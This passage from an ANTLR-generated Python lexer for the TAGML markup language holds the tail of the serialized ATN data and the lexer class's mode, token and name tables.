buf.write("o\u0210\3\2\2\2q\u0217\3\2\2\2s\u0221\3\2\2\2u\u0223\3")
buf.write("\2\2\2w\u0225\3\2\2\2y\u0227\3\2\2\2{\u0229\3\2\2\2}\u0232")
buf.write("\3\2\2\2\177\u0236\3\2\2\2\u0081\u023a\3\2\2\2\u0083\u0240")
buf.write("\3\2\2\2\u0085\u0244\3\2\2\2\u0087\u0248\3\2\2\2\u0089")
buf.write("\u024c\3\2\2\2\u008b\u0250\3\2\2\2\u008d\u0254\3\2\2\2")
buf.write("\u008f\u0262\3\2\2\2\u0091\u0264\3\2\2\2\u0093\u0266\3")
buf.write("\2\2\2\u0095\u0269\3\2\2\2\u0097\u026c\3\2\2\2\u0099\u026e")
buf.write("\3\2\2\2\u009b\u0270\3\2\2\2\u009d\u0272\3\2\2\2\u009f")
buf.write("\u0274\3\2\2\2\u00a1\u0276\3\2\2\2\u00a3\u0278\3\2\2\2")
buf.write("\u00a5\u027a\3\2\2\2\u00a7\u027c\3\2\2\2\u00a9\u027e\3")
buf.write("\2\2\2\u00ab\u0280\3\2\2\2\u00ad\u0282\3\2\2\2\u00af\u0284")
buf.write("\3\2\2\2\u00b1\u028b\3\2\2\2\u00b3\u0290\3\2\2\2\u00b5")
buf.write("\u0295\3\2\2\2\u00b7\u029a\3\2\2\2\u00b9\u029f\3\2\2\2")
buf.write("\u00bb\u02a1\3\2\2\2\u00bd\u02a4\3\2\2\2\u00bf\u02a6\3")
buf.write("\2\2\2\u00c1\u02a8\3\2\2\2\u00c3\u02aa\3\2\2\2\u00c5\u02ac")
buf.write("\3\2\2\2\u00c7\u02ae\3\2\2\2\u00c9\u02b0\3\2\2\2\u00cb")
buf.write("\u02b2\3\2\2\2\u00cd\u02b4\3\2\2\2\u00cf\u02b6\3\2\2\2")
buf.write("\u00d1\u02b8\3\2\2\2\u00d3\u02ba\3\2\2\2\u00d5\u02bc\3")
buf.write("\2\2\2\u00d7\u02be\3\2\2\2\u00d9\u02c0\3\2\2\2\u00db\u02c2")
buf.write("\3\2\2\2\u00dd\u02c4\3\2\2\2\u00df\u02c6\3\2\2\2\u00e1")
buf.write("\u02c8\3\2\2\2\u00e3\u02ca\3\2\2\2\u00e5\u02cc\3\2\2\2")
buf.write("\u00e7\u02ce\3\2\2\2\u00e9\u02d0\3\2\2\2\u00eb\u02d2\3")
buf.write("\2\2\2\u00ed\u02d4\3\2\2\2\u00ef\u02d6\3\2\2\2\u00f1\u02dc")
buf.write("\3\2\2\2\u00f3\u02df\3\2\2\2\u00f5\u02e3\3\2\2\2\u00f7")
buf.write("\u02e6\3\2\2\2\u00f9\u00fa\7]\2\2\u00fa\u00fb\7#\2\2\u00fb")
buf.write("\u00fc\7p\2\2\u00fc\u00fd\7u\2\2\u00fd\u00fe\7\"\2\2\u00fe")
buf.write("\u00ff\3\2\2\2\u00ff\u0100\b\2\2\2\u0100\16\3\2\2\2\u0101")
buf.write("\u0102\5\u008dB\2\u0102\u0103\3\2\2\2\u0103\u0104\b\3")
buf.write("\3\2\u0104\20\3\2\2\2\u0105\u0106\5\u00abQ\2\u0106\u0107")
buf.write("\3\2\2\2\u0107\u0108\b\4\4\2\u0108\22\3\2\2\2\u0109\u010a")
buf.write("\5\u0093E\2\u010a\u010b\3\2\2\2\u010b\u010c\b\5\5\2\u010c")
buf.write("\24\3\2\2\2\u010d\u010e\5\u0091D\2\u010e\u010f\3\2\2\2")
buf.write("\u010f\u0110\b\6\6\2\u0110\26\3\2\2\2\u0111\u0114\n\2")
buf.write("\2\2\u0112\u0114\5\u00b1T\2\u0113\u0111\3\2\2\2\u0113")
buf.write("\u0112\3\2\2\2\u0114\u0115\3\2\2\2\u0115\u0113\3\2\2\2")
buf.write("\u0115\u0116\3\2\2\2\u0116\30\3\2\2\2\u0117\u0122\5\u00f3")
buf.write("u\2\u0118\u011c\5\u00f3u\2\u0119\u011b\5\u00f1t\2\u011a")
buf.write("\u0119\3\2\2\2\u011b\u011e\3\2\2\2\u011c\u011a\3\2\2\2")
buf.write("\u011c\u011d\3\2\2\2\u011d\u011f\3\2\2\2\u011e\u011c\3")
buf.write("\2\2\2\u011f\u0120\5\u00f5v\2\u0120\u0122\3\2\2\2\u0121")
buf.write("\u0117\3\2\2\2\u0121\u0118\3\2\2\2\u0122\32\3\2\2\2\u0123")
buf.write("\u0125\5\u00f1t\2\u0124\u0123\3\2\2\2\u0125\u0126\3\2")
buf.write("\2\2\u0126\u0124\3\2\2\2\u0126\u0127\3\2\2\2\u0127\34")
buf.write("\3\2\2\2\u0128\u0129\5\u00f7w\2\u0129\u012a\3\2\2\2\u012a")
buf.write("\u012b\b\n\3\2\u012b\36\3\2\2\2\u012c\u012d\7j\2\2\u012d")
buf.write("\u012e\7v\2\2\u012e\u012f\7v\2\2\u012f\u0130\7r\2\2\u0130")
buf.write("\u0131\7<\2\2\u0131\u0132\7\61\2\2\u0132\u013c\7\61\2")
buf.write("\2\u0133\u0134\7j\2\2\u0134\u0135\7v\2\2\u0135\u0136\7")
buf.write("v\2\2\u0136\u0137\7r\2\2\u0137\u0138\7u\2\2\u0138\u0139")
buf.write("\7<\2\2\u0139\u013a\7\61\2\2\u013a\u013c\7\61\2\2\u013b")
buf.write("\u012c\3\2\2\2\u013b\u0133\3\2\2\2\u013c\u013f\3\2\2\2")
buf.write("\u013d\u0140\5\u00f1t\2\u013e\u0140\4\60\61\2\u013f\u013d")
buf.write("\3\2\2\2\u013f\u013e\3\2\2\2\u0140\u0141\3\2\2\2\u0141")
buf.write("\u013f\3\2\2\2\u0141\u0142\3\2\2\2\u0142 \3\2\2\2\u0143")
buf.write("\u0144\7_\2\2\u0144\u0145\3\2\2\2\u0145\u0146\b\f\7\2")
buf.write("\u0146\"\3\2\2\2\u0147\u0148\5\u008dB\2\u0148\u0149\3")
buf.write("\2\2\2\u0149\u014a\b\r\3\2\u014a$\3\2\2\2\u014b\u014e")
buf.write("\5\u009bI\2\u014c\u014e\5\u009dJ\2\u014d\u014b\3\2\2\2")
buf.write("\u014d\u014c\3\2\2\2\u014e&\3\2\2\2\u014f\u0150\5\u00a9")
buf.write("P\2\u0150(\3\2\2\2\u0151\u0152\5\u0099H\2\u0152*\3\2\2")
buf.write("\2\u0153\u0154\5\31\b\2\u0154,\3\2\2\2\u0155\u015c\5\u00a1")
buf.write("L\2\u0156\u015d\5\31\b\2\u0157\u0159\5\u00afS\2\u0158")
buf.write("\u0157\3\2\2\2\u0159\u015a\3\2\2\2\u015a\u0158\3\2\2\2")
buf.write("\u015a\u015b\3\2\2\2\u015b\u015d\3\2\2\2\u015c\u0156\3")
buf.write("\2\2\2\u015c\u0158\3\2\2\2\u015d.\3\2\2\2\u015e\u015f")
buf.write("\5\u00f7w\2\u015f\u0160\3\2\2\2\u0160\u0161\b\23\3\2\u0161")
buf.write("\u0162\b\23\b\2\u0162\60\3\2\2\2\u0163\u0164\5\u00adR")
buf.write("\2\u0164\u0165\3\2\2\2\u0165\u0166\b\24\7\2\u0166\62\3")
buf.write("\2\2\2\u0167\u0168\5\u008fC\2\u0168\u0169\3\2\2\2\u0169")
buf.write("\u016a\b\25\7\2\u016a\64\3\2\2\2\u016b\u016c\7<\2\2\u016c")
buf.write("\u016d\7k\2\2\u016d\u016e\7f\2\2\u016e\66\3\2\2\2\u016f")
buf.write("\u0170\5\31\b\2\u01708\3\2\2\2\u0171\u0172\5\u00f7w\2")
buf.write("\u0172\u0173\3\2\2\2\u0173\u0174\b\30\3\2\u0174:\3\2\2")
buf.write("\2\u0175\u0176\7?\2\2\u0176\u0177\3\2\2\2\u0177\u0178")
buf.write("\b\31\t\2\u0178<\3\2\2\2\u0179\u017a\7/\2\2\u017a\u017b")
buf.write("\7@\2\2\u017b\u017c\3\2\2\2\u017c\u017d\b\32\n\2\u017d")
buf.write(">\3\2\2\2\u017e\u017f\5\u008fC\2\u017f\u0180\3\2\2\2\u0180")
buf.write("\u0181\b\33\7\2\u0181\u0182\b\33\7\2\u0182@\3\2\2\2\u0183")
buf.write("\u0184\5\u00adR\2\u0184\u0185\3\2\2\2\u0185\u0186\b\34")
buf.write("\7\2\u0186\u0187\b\34\7\2\u0187B\3\2\2\2\u0188\u0189\5")
buf.write("\u00f7w\2\u0189\u018a\3\2\2\2\u018a\u018b\b\35\3\2\u018b")
buf.write("D\3\2\2\2\u018c\u018f\7$\2\2\u018d\u0190\n\3\2\2\u018e")
buf.write("\u0190\5\u00b9X\2\u018f\u018d\3\2\2\2\u018f\u018e\3\2")
buf.write("\2\2\u0190\u0191\3\2\2\2\u0191\u018f\3\2\2\2\u0191\u0192")
buf.write("\3\2\2\2\u0192\u0193\3\2\2\2\u0193\u019d\7$\2\2\u0194")
buf.write("\u0197\7)\2\2\u0195\u0198\n\4\2\2\u0196\u0198\5\u00b7")
buf.write("W\2\u0197\u0195\3\2\2\2\u0197\u0196\3\2\2\2\u0198\u0199")
buf.write("\3\2\2\2\u0199\u0197\3\2\2\2\u0199\u019a\3\2\2\2\u019a")
buf.write("\u019b\3\2\2\2\u019b\u019d\7)\2\2\u019c\u018c\3\2\2\2")
buf.write("\u019c\u0194\3\2\2\2\u019d\u019e\3\2\2\2\u019e\u019f\b")
buf.write("\36\7\2\u019fF\3\2\2\2\u01a0\u01a2\5\u00afS\2\u01a1\u01a0")
buf.write("\3\2\2\2\u01a2\u01a3\3\2\2\2\u01a3\u01a1\3\2\2\2\u01a3")
buf.write("\u01a4\3\2\2\2\u01a4\u01ab\3\2\2\2\u01a5\u01a7\7\60\2")
buf.write("\2\u01a6\u01a8\5\u00afS\2\u01a7\u01a6\3\2\2\2\u01a8\u01a9")
buf.write("\3\2\2\2\u01a9\u01a7\3\2\2\2\u01a9\u01aa\3\2\2\2\u01aa")
buf.write("\u01ac\3\2\2\2\u01ab\u01a5\3\2\2\2\u01ab\u01ac\3\2\2\2")
buf.write("\u01ac\u01ad\3\2\2\2\u01ad\u01ae\b\37\7\2\u01aeH\3\2\2")
buf.write("\2\u01af\u01b0\5\u00e3m\2\u01b0\u01b1\5\u00dfk\2\u01b1")
buf.write("\u01b2\5\u00e5n\2\u01b2\u01b3\5\u00c5^\2\u01b3\u01b4\3")
buf.write("\2\2\2\u01b4\u01b5\b \7\2\u01b5J\3\2\2\2\u01b6\u01b7\5")
buf.write("\u00c7_\2\u01b7\u01b8\5\u00bdZ\2\u01b8\u01b9\5\u00d3e")
buf.write("\2\u01b9\u01ba\5\u00e1l\2\u01ba\u01bb\5\u00c5^\2\u01bb")
buf.write("\u01bc\3\2\2\2\u01bc\u01bd\b!\7\2\u01bdL\3\2\2\2\u01be")
buf.write("\u01bf\5\31\b\2\u01bf\u01c0\3\2\2\2\u01c0\u01c1\b\"\7")
buf.write("\2\u01c1N\3\2\2\2\u01c2\u01c3\7]\2\2\u01c3\u01c4\7@\2")
buf.write("\2\u01c4\u01c5\3\2\2\2\u01c5\u01c6\b#\13\2\u01c6P\3\2")
buf.write("\2\2\u01c7\u01c8\7}\2\2\u01c8\u01c9\3\2\2\2\u01c9\u01ca")
buf.write("\b$\f\2\u01caR\3\2\2\2\u01cb\u01cc\5\u00abQ\2\u01cc\u01cd")
buf.write("\3\2\2\2\u01cd\u01ce\b%\r\2\u01ce\u01cf\b%\t\2\u01cfT")
buf.write("\3\2\2\2\u01d0\u01d1\5\31\b\2\u01d1\u01d2\3\2\2\2\u01d2")
buf.write("\u01d3\b&\7\2\u01d3V\3\2\2\2\u01d4\u01d5\5\u008dB\2\u01d5")
buf.write("\u01d6\3\2\2\2\u01d6\u01d7\b\'\3\2\u01d7X\3\2\2\2\u01d8")
buf.write("\u01d9\5\u00abQ\2\u01d9\u01da\3\2\2\2\u01da\u01db\b(\4")
buf.write("\2\u01dbZ\3\2\2\2\u01dc\u01dd\5\u0093E\2\u01dd\u01de\3")
buf.write("\2\2\2\u01de\u01df\b)\5\2\u01df\\\3\2\2\2\u01e0\u01e1")
buf.write("\5\u0091D\2\u01e1\u01e2\3\2\2\2\u01e2\u01e3\b*\6\2\u01e3")
buf.write("^\3\2\2\2\u01e4\u01e7\n\2\2\2\u01e5\u01e7\5\u00b1T\2\u01e6")
buf.write("\u01e4\3\2\2\2\u01e6\u01e5\3\2\2\2\u01e7\u01e8\3\2\2\2")
buf.write("\u01e8\u01e6\3\2\2\2\u01e8\u01e9\3\2\2\2\u01e9`\3\2\2")
buf.write("\2\u01ea\u01eb\7>\2\2\u01eb\u01ec\7_\2\2\u01ec\u01ed\3")
buf.write("\2\2\2\u01ed\u01ee\b,\7\2\u01ee\u01ef\b,\7\2\u01efb\3")
buf.write("\2\2\2\u01f0\u01f1\5\u00f7w\2\u01f1\u01f2\3\2\2\2\u01f2")
buf.write("\u01f3\b-\3\2\u01f3d\3\2\2\2\u01f4\u01f5\7<\2\2\u01f5")
buf.write("\u01f6\7k\2\2\u01f6\u01f7\7f\2\2\u01f7f\3\2\2\2\u01f8")
buf.write("\u01f9\5\31\b\2\u01f9h\3\2\2\2\u01fa\u01fb\7/\2\2\u01fb")
buf.write("\u01fc\7@\2\2\u01fc\u01fd\3\2\2\2\u01fd\u01fe\b\60\n\2")
buf.write("\u01fej\3\2\2\2\u01ff\u0200\7?\2\2\u0200\u0201\3\2\2\2")
buf.write("\u0201\u0202\b\61\t\2\u0202l\3\2\2\2\u0203\u0205\5\u00f7")
buf.write("w\2\u0204\u0203\3\2\2\2\u0205\u0208\3\2\2\2\u0206\u0204")
buf.write("\3\2\2\2\u0206\u0207\3\2\2\2\u0207\u0209\3\2\2\2\u0208")
buf.write("\u0206\3\2\2\2\u0209\u020a\7\177\2\2\u020a\u020b\3\2\2")
buf.write("\2\u020b\u020c\b\62\7\2\u020c\u020d\b\62\7\2\u020dn\3")
buf.write("\2\2\2\u020e\u0211\5\u00f7w\2\u020f\u0211\5\u00a9P\2\u0210")
buf.write("\u020e\3\2\2\2\u0210\u020f\3\2\2\2\u0211\u0212\3\2\2\2")
buf.write("\u0212\u0213\b\63\t\2\u0213p\3\2\2\2\u0214\u0216\5\u00f7")
buf.write("w\2\u0215\u0214\3\2\2\2\u0216\u0219\3\2\2\2\u0217\u0215")
buf.write("\3\2\2\2\u0217\u0218\3\2\2\2\u0218\u021a\3\2\2\2\u0219")
buf.write("\u0217\3\2\2\2\u021a\u021b\5\u00adR\2\u021b\u021c\3\2")
buf.write("\2\2\u021c\u021d\b\64\7\2\u021d\u021e\b\64\7\2\u021er")
buf.write("\3\2\2\2\u021f\u0222\5\u009bI\2\u0220\u0222\5\u009fK\2")
buf.write("\u0221\u021f\3\2\2\2\u0221\u0220\3\2\2\2\u0222t\3\2\2")
buf.write("\2\u0223\u0224\5\31\b\2\u0224v\3\2\2\2\u0225\u0226\5\u0099")
buf.write("H\2\u0226x\3\2\2\2\u0227\u0228\5\u00a9P\2\u0228z\3\2\2")
buf.write("\2\u0229\u0230\5\u00a1L\2\u022a\u0231\5\31\b\2\u022b\u022d")
buf.write("\5\u00afS\2\u022c\u022b\3\2\2\2\u022d\u022e\3\2\2\2\u022e")
buf.write("\u022c\3\2\2\2\u022e\u022f\3\2\2\2\u022f\u0231\3\2\2\2")
buf.write("\u0230\u022a\3\2\2\2\u0230\u022c\3\2\2\2\u0231|\3\2\2")
buf.write("\2\u0232\u0233\5\u00f7w\2\u0233\u0234\3\2\2\2\u0234\u0235")
buf.write("\b:\3\2\u0235~\3\2\2\2\u0236\u0237\5\u00adR\2\u0237\u0238")
buf.write("\3\2\2\2\u0238\u0239\b;\7\2\u0239\u0080\3\2\2\2\u023a")
buf.write("\u023b\5\u008dB\2\u023b\u023c\3\2\2\2\u023c\u023d\b<\3")
buf.write("\2\u023d\u0082\3\2\2\2\u023e\u0241\n\5\2\2\u023f\u0241")
buf.write("\5\u00b3U\2\u0240\u023e\3\2\2\2\u0240\u023f\3\2\2\2\u0241")
buf.write("\u0242\3\2\2\2\u0242\u0240\3\2\2\2\u0242\u0243\3\2\2\2")
buf.write("\u0243\u0084\3\2\2\2\u0244\u0245\5\u00abQ\2\u0245\u0246")
buf.write("\3\2\2\2\u0246\u0247\b>\4\2\u0247\u0086\3\2\2\2\u0248")
buf.write("\u0249\5\u0093E\2\u0249\u024a\3\2\2\2\u024a\u024b\b?\5")
buf.write("\2\u024b\u0088\3\2\2\2\u024c\u024d\5\u0091D\2\u024d\u024e")
buf.write("\3\2\2\2\u024e\u024f\b@\6\2\u024f\u008a\3\2\2\2\u0250")
buf.write("\u0251\5\u0095F\2\u0251\u0252\3\2\2\2\u0252\u0253\bA\7")
buf.write("\2\u0253\u008c\3\2\2\2\u0254\u0255\7]\2\2\u0255\u0256")
buf.write("\7#\2\2\u0256\u0257\7\"\2\2\u0257\u025b\3\2\2\2\u0258")
buf.write("\u025a\13\2\2\2\u0259\u0258\3\2\2\2\u025a\u025d\3\2\2")
buf.write("\2\u025b\u025c\3\2\2\2\u025b\u0259\3\2\2\2\u025c\u025e")
buf.write("\3\2\2\2\u025d\u025b\3\2\2\2\u025e\u025f\7\"\2\2\u025f")
buf.write("\u0260\7#\2\2\u0260\u0261\7_\2\2\u0261\u008e\3\2\2\2\u0262")
buf.write("\u0263\7@\2\2\u0263\u0090\3\2\2\2\u0264\u0265\7>\2\2\u0265")
buf.write("\u0092\3\2\2\2\u0266\u0267\7>\2\2\u0267\u0268\7~\2\2\u0268")
buf.write("\u0094\3\2\2\2\u0269\u026a\7~\2\2\u026a\u026b\7@\2\2\u026b")
buf.write("\u0096\3\2\2\2\u026c\u026d\5\u0099H\2\u026d\u0098\3\2")
buf.write("\2\2\u026e\u026f\7~\2\2\u026f\u009a\3\2\2\2\u0270\u0271")
buf.write("\7A\2\2\u0271\u009c\3\2\2\2\u0272\u0273\7-\2\2\u0273\u009e")
buf.write("\3\2\2\2\u0274\u0275\7/\2\2\u0275\u00a0\3\2\2\2\u0276")
buf.write("\u0277\7\u0080\2\2\u0277\u00a2\3\2\2\2\u0278\u0279\5\u00ab")
buf.write("Q\2\u0279\u00a4\3\2\2\2\u027a\u027b\5\u00adR\2\u027b\u00a6")
buf.write("\3\2\2\2\u027c\u027d\7\60\2\2\u027d\u00a8\3\2\2\2\u027e")
buf.write("\u027f\7.\2\2\u027f\u00aa\3\2\2\2\u0280\u0281\7]\2\2\u0281")
buf.write("\u00ac\3\2\2\2\u0282\u0283\7_\2\2\u0283\u00ae\3\2\2\2")
buf.write("\u0284\u0285\t\6\2\2\u0285\u00b0\3\2\2\2\u0286\u0287\7")
buf.write("^\2\2\u0287\u028c\7>\2\2\u0288\u0289\7^\2\2\u0289\u028c")
buf.write("\7]\2\2\u028a\u028c\5\u00bbY\2\u028b\u0286\3\2\2\2\u028b")
buf.write("\u0288\3\2\2\2\u028b\u028a\3\2\2\2\u028c\u00b2\3\2\2\2")
buf.write("\u028d\u0291\5\u00b1T\2\u028e\u028f\7^\2\2\u028f\u0291")
buf.write("\7~\2\2\u0290\u028d\3\2\2\2\u0290\u028e\3\2\2\2\u0291")
buf.write("\u00b4\3\2\2\2\u0292\u0296\5\u00bbY\2\u0293\u0294\7^\2")
buf.write("\2\u0294\u0296\7#\2\2\u0295\u0292\3\2\2\2\u0295\u0293")
buf.write("\3\2\2\2\u0296\u00b6\3\2\2\2\u0297\u029b\5\u00bbY\2\u0298")
buf.write("\u0299\7^\2\2\u0299\u029b\7)\2\2\u029a\u0297\3\2\2\2\u029a")
buf.write("\u0298\3\2\2\2\u029b\u00b8\3\2\2\2\u029c\u02a0\5\u00bb")
buf.write("Y\2\u029d\u029e\7^\2\2\u029e\u02a0\7$\2\2\u029f\u029c")
buf.write("\3\2\2\2\u029f\u029d\3\2\2\2\u02a0\u00ba\3\2\2\2\u02a1")
buf.write("\u02a2\7^\2\2\u02a2\u02a3\7^\2\2\u02a3\u00bc\3\2\2\2\u02a4")
buf.write("\u02a5\t\7\2\2\u02a5\u00be\3\2\2\2\u02a6\u02a7\t\b\2\2")
buf.write("\u02a7\u00c0\3\2\2\2\u02a8\u02a9\t\t\2\2\u02a9\u00c2\3")
buf.write("\2\2\2\u02aa\u02ab\t\n\2\2\u02ab\u00c4\3\2\2\2\u02ac\u02ad")
buf.write("\t\13\2\2\u02ad\u00c6\3\2\2\2\u02ae\u02af\t\f\2\2\u02af")
buf.write("\u00c8\3\2\2\2\u02b0\u02b1\t\r\2\2\u02b1\u00ca\3\2\2\2")
buf.write("\u02b2\u02b3\t\16\2\2\u02b3\u00cc\3\2\2\2\u02b4\u02b5")
buf.write("\t\17\2\2\u02b5\u00ce\3\2\2\2\u02b6\u02b7\t\20\2\2\u02b7")
buf.write("\u00d0\3\2\2\2\u02b8\u02b9\t\21\2\2\u02b9\u00d2\3\2\2")
buf.write("\2\u02ba\u02bb\t\22\2\2\u02bb\u00d4\3\2\2\2\u02bc\u02bd")
buf.write("\t\23\2\2\u02bd\u00d6\3\2\2\2\u02be\u02bf\t\24\2\2\u02bf")
buf.write("\u00d8\3\2\2\2\u02c0\u02c1\t\25\2\2\u02c1\u00da\3\2\2")
buf.write("\2\u02c2\u02c3\t\26\2\2\u02c3\u00dc\3\2\2\2\u02c4\u02c5")
buf.write("\t\27\2\2\u02c5\u00de\3\2\2\2\u02c6\u02c7\t\30\2\2\u02c7")
buf.write("\u00e0\3\2\2\2\u02c8\u02c9\t\31\2\2\u02c9\u00e2\3\2\2")
buf.write("\2\u02ca\u02cb\t\32\2\2\u02cb\u00e4\3\2\2\2\u02cc\u02cd")
buf.write("\t\33\2\2\u02cd\u00e6\3\2\2\2\u02ce\u02cf\t\34\2\2\u02cf")
buf.write("\u00e8\3\2\2\2\u02d0\u02d1\t\35\2\2\u02d1\u00ea\3\2\2")
buf.write("\2\u02d2\u02d3\t\36\2\2\u02d3\u00ec\3\2\2\2\u02d4\u02d5")
buf.write("\t\37\2\2\u02d5\u00ee\3\2\2\2\u02d6\u02d7\t \2\2\u02d7")
buf.write("\u00f0\3\2\2\2\u02d8\u02dd\5\u00f3u\2\u02d9\u02dd\t!\2")
buf.write("\2\u02da\u02dd\5\u00afS\2\u02db\u02dd\t\"\2\2\u02dc\u02d8")
buf.write("\3\2\2\2\u02dc\u02d9\3\2\2\2\u02dc\u02da\3\2\2\2\u02dc")
buf.write("\u02db\3\2\2\2\u02dd\u00f2\3\2\2\2\u02de\u02e0\t#\2\2")
buf.write("\u02df\u02de\3\2\2\2\u02e0\u00f4\3\2\2\2\u02e1\u02e4\5")
buf.write("\u00f3u\2\u02e2\u02e4\5\u00afS\2\u02e3\u02e1\3\2\2\2\u02e3")
buf.write("\u02e2\3\2\2\2\u02e4\u00f6\3\2\2\2\u02e5\u02e7\t$\2\2")
buf.write("\u02e6\u02e5\3\2\2\2\u02e7\u02e8\3\2\2\2\u02e8\u02e6\3")
buf.write("\2\2\2\u02e8\u02e9\3\2\2\2\u02e9\u00f8\3\2\2\2\64\2\3")
buf.write("\4\5\6\7\b\t\n\13\f\u0113\u0115\u011c\u0121\u0126\u013b")
buf.write("\u013f\u0141\u014d\u015a\u015c\u018f\u0191\u0197\u0199")
buf.write("\u019c\u01a3\u01a9\u01ab\u01e6\u01e8\u0206\u0210\u0217")
buf.write("\u0221\u022e\u0230\u0240\u0242\u025b\u028b\u0290\u0295")
buf.write("\u029a\u029f\u02dc\u02df\u02e3\u02e8\16\7\3\2\b\2\2\7")
buf.write("\4\2\7\f\2\7\13\2\6\2\2\7\5\2\7\6\2\7\7\2\7\b\2\7\t\2")
buf.write("\7\n\2")
return buf.getvalue()
class TAGMLLexer(Lexer):
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
INSIDE_NAMESPACE = 1
INSIDE_MARKUP_OPENER = 2
ANNOTATIONS = 3
ANNOTATION_VALUE = 4
INSIDE_REF_VALUE = 5
INSIDE_RICH_TEXT = 6
INSIDE_OBJECT = 7
INSIDE_LIST = 8
INSIDE_MARKUP_CLOSER = 9
INSIDE_TEXT_VARIATION = 10
DEFAULT_NamespaceOpener = 1
DEFAULT_Comment = 2
DEFAULT_BeginOpenMarkup = 3
DEFAULT_BeginTextVariation = 4
DEFAULT_BeginCloseMarkup = 5
DEFAULT_Text = 6
NAME = 7
IN_NamespaceIdentifier = 8
IN_WS = 9
IN_NamespaceURI = 10
IN_NamespaceCloser = 11
IMO_Comment = 12
IMO_Prefix = 13
IMO_Comma = 14
IMO_Divider = 15
IMO_Name = 16
IMO_Suffix = 17
IMO_WS = 18
IMO_EndMilestoneMarkup = 19
IMO_EndOpenMarkup = 20
A_IdAnnotation = 21
A_AnnotationName = 22
A_WS = 23
A_EQ = 24
A_Ref = 25
A_EndOpenMarkup = 26
A_EndMilestoneMarkup = 27
AV_WS = 28
AV_StringValue = 29
AV_NumberValue = 30
AV_TRUE = 31
AV_FALSE = 32
AV_IdValue = 33
AV_RichTextOpener = 34
AV_ObjectOpener = 35
AV_ListOpener = 36
RV_RefValue = 37
IRT_Comment = 38
IRT_BeginOpenMarkup = 39
IRT_BeginTextVariation = 40
IRT_BeginCloseMarkup = 41
IRT_Text = 42
IRT_RichTextCloser = 43
IO_WS = 44
IO_IdAnnotation = 45
IO_AnnotationName = 46
IO_Ref = 47
IO_EQ = 48
IO_ObjectCloser = 49
IL_SEPARATOR = 50
IL_ListCloser = 51
IMC_Prefix = 52
IMC_Name = 53
IMC_Divider = 54
IMC_Comma = 55
IMC_Suffix = 56
IMC_WS = 57
IMC_EndCloseMarkup = 58
ITV_Comment = 59
ITV_Text = 60
ITV_BeginOpenMarkup = 61
ITV_BeginTextVariation = 62
ITV_BeginCloseMarkup = 63
ITV_EndTextVariation = 64
Comment = 65
TagOpenEndChar = 66
TagCloseStartChar = 67
TextVariationStartTag = 68
TextVariationEndTag = 69
TextVariationSeparator = 70
PIPE = 71
Optional = 72
Resume = 73
Suspend = 74
TILDE = 75
LIST_OPENER = 76
LIST_CLOSER = 77
DOT = 78
COMMA = 79
LEFT_SQUARE_BRACKET = 80
RIGHT_SQUARE_BRACKET = 81
DIGIT = 82
REGULAR_TEXT_ESCAPE_CHARACTER = 83
TEXT_VARIATION_ESCAPE_CHARACTER = 84
COMMENT_ESCAPE_CHARACTER = 85
SINGLE_QUOTED_TEXT_ESCAPE_CHARACTER = 86
DOUBLE_QUOTED_TEXT_ESCAPE_CHARACTER = 87
NameEndChar = 88
WS = 89
channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]
modeNames = [ "DEFAULT_MODE", "INSIDE_NAMESPACE", "INSIDE_MARKUP_OPENER",
"ANNOTATIONS", "ANNOTATION_VALUE", "INSIDE_REF_VALUE",
"INSIDE_RICH_TEXT", "INSIDE_OBJECT", "INSIDE_LIST", "INSIDE_MARKUP_CLOSER",
"INSIDE_TEXT_VARIATION" ]
literalNames = [ "<INVALID>",
"'[!ns '", "'[>'", "'{'", "'<]'", "'>'", "'<'", "'<|'", "'|>'",
"'|'", "'?'", "'+'", "'-'", "'~'", "'.'", "','", "'['" ]
symbolicNames = [ "<INVALID>",
"DEFAULT_NamespaceOpener", "DEFAULT_Comment", "DEFAULT_BeginOpenMarkup",
"DEFAULT_BeginTextVariation", "DEFAULT_BeginCloseMarkup", "DEFAULT_Text",
"NAME", "IN_NamespaceIdentifier", "IN_WS", "IN_NamespaceURI",
"IN_NamespaceCloser", "IMO_Comment", "IMO_Prefix", "IMO_Comma",
"IMO_Divider", "IMO_Name", "IMO_Suffix", "IMO_WS", "IMO_EndMilestoneMarkup",
"IMO_EndOpenMarkup", "A_IdAnnotation", "A_AnnotationName", "A_WS",
"A_EQ", "A_Ref", "A_EndOpenMarkup", "A_EndMilestoneMarkup",
"AV_WS", "AV_StringValue", "AV_NumberValue", "AV_TRUE", "AV_FALSE",
"AV_IdValue", "AV_RichTextOpener", "AV_ObjectOpener", "AV_ListOpener",
"RV_RefValue", "IRT_Comment", "IRT_BeginOpenMarkup", "IRT_BeginTextVariation",
"IRT_BeginCloseMarkup", "IRT_Text", "IRT_RichTextCloser", "IO_WS",
"IO_IdAnnotation", "IO_AnnotationName", "IO_Ref", "IO_EQ", "IO_ObjectCloser",
"IL_SEPARATOR", "IL_ListCloser", "IMC_Prefix", "IMC_Name", "IMC_Divider",
"IMC_Comma", "IMC_Suffix", "IMC_WS", "IMC_EndCloseMarkup", "ITV_Comment",
"ITV_Text", "ITV_BeginOpenMarkup", "ITV_BeginTextVariation",
"ITV_BeginCloseMarkup", "ITV_EndTextVariation", "Comment", "TagOpenEndChar",
"TagCloseStartChar", "TextVariationStartTag", "TextVariationEndTag",
"TextVariationSeparator", "PIPE", "Optional", "Resume", "Suspend",
"TILDE", "LIST_OPENER", "LIST_CLOSER", "DOT", "COMMA", "LEFT_SQUARE_BRACKET",
"RIGHT_SQUARE_BRACKET", "DIGIT", "REGULAR_TEXT_ESCAPE_CHARACTER",
"TEXT_VARIATION_ESCAPE_CHARACTER", "COMMENT_ESCAPE_CHARACTER",
"SINGLE_QUOTED_TEXT_ESCAPE_CHARACTER", "DOUBLE_QUOTED_TEXT_ESCAPE_CHARACTER",
"NameEndChar", "WS" ]
ruleNames = [ "DEFAULT_NamespaceOpener", "DEFAULT_Comment", "DEFAULT_BeginOpenMarkup",
"DEFAULT_BeginTextVariation", "DEFAULT_BeginCloseMarkup",
"DEFAULT_Text", "NAME", "IN_NamespaceIdentifier", "IN_WS",
"IN_NamespaceURI", "IN_NamespaceCloser", "IMO_Comment",
"IMO_Prefix", "IMO_Comma", "IMO_Divider", "IMO_Name",
"IMO_Suffix", "IMO_WS", "IMO_EndMilestoneMarkup", "IMO_EndOpenMarkup",
"A_IdAnnotation", "A_AnnotationName", "A_WS", "A_EQ",
